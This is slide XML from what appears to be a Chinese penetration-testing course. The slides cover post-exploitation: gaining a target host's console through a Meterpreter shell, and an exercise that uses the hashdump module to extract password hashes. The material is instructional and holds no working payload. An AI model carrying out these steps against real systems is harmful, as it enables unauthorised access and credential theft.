            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.6 后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="文本框 148"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5042535" y="390525"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>利用shell命令可以获得目标主机的控制台，有了控制台，就可以对目标系统进行任意文件操作，也可以执行各类 DOS命令，如图2-4-60所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="图片 20"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5042535" y="1312545"/>
            <a:ext cx="5276850" cy="3848100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="文本框 149"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5042535" y="5160645"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-60 利用shell命令获得目标主机控制台</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5042535" y="5761990"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可以查找具体的meterpreter命令进行进一步的操作，此时目标主机控制权已被获取。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786245" y="6761480"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1608455" y="2546985"/>
            <a:ext cx="8222615" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用hashdump模块来提取系统的用户名和密码哈希值。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.利用meterperter相关命令来获取目标主机控制台。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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8" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.6 后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cT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Text Placeholder 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071996" y="2766621"/>
            <a:ext cx="3008380" cy="662379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="1565050"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="927951"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="982844"/>
              <a:ext cx="1120898" cy="842780"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="927951"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="2471202"/>
            <a:ext cx="1192345" cy="672217"/>
            <a:chOff x="2215144" y="1952311"/>
            <a:chExt cx="1244730" cy="924318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="平行四边形 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="2033848"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="1952311"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="3407000"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="3018134"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="平行四边形 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="3084852"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="文本框 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="3018134"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596626" y="4316986"/>
            <a:ext cx="1192345" cy="677512"/>
            <a:chOff x="2215144" y="4047039"/>
            <a:chExt cx="1244730" cy="931598"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="平行四边形 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="4135856"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="4047039"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="1582798"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="953426"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4615667" y="1005461"/>
              <a:ext cx="3228975" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.1 常用命令</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="953426"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="组合 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="2508336"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="1647579"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644505" y="1715136"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
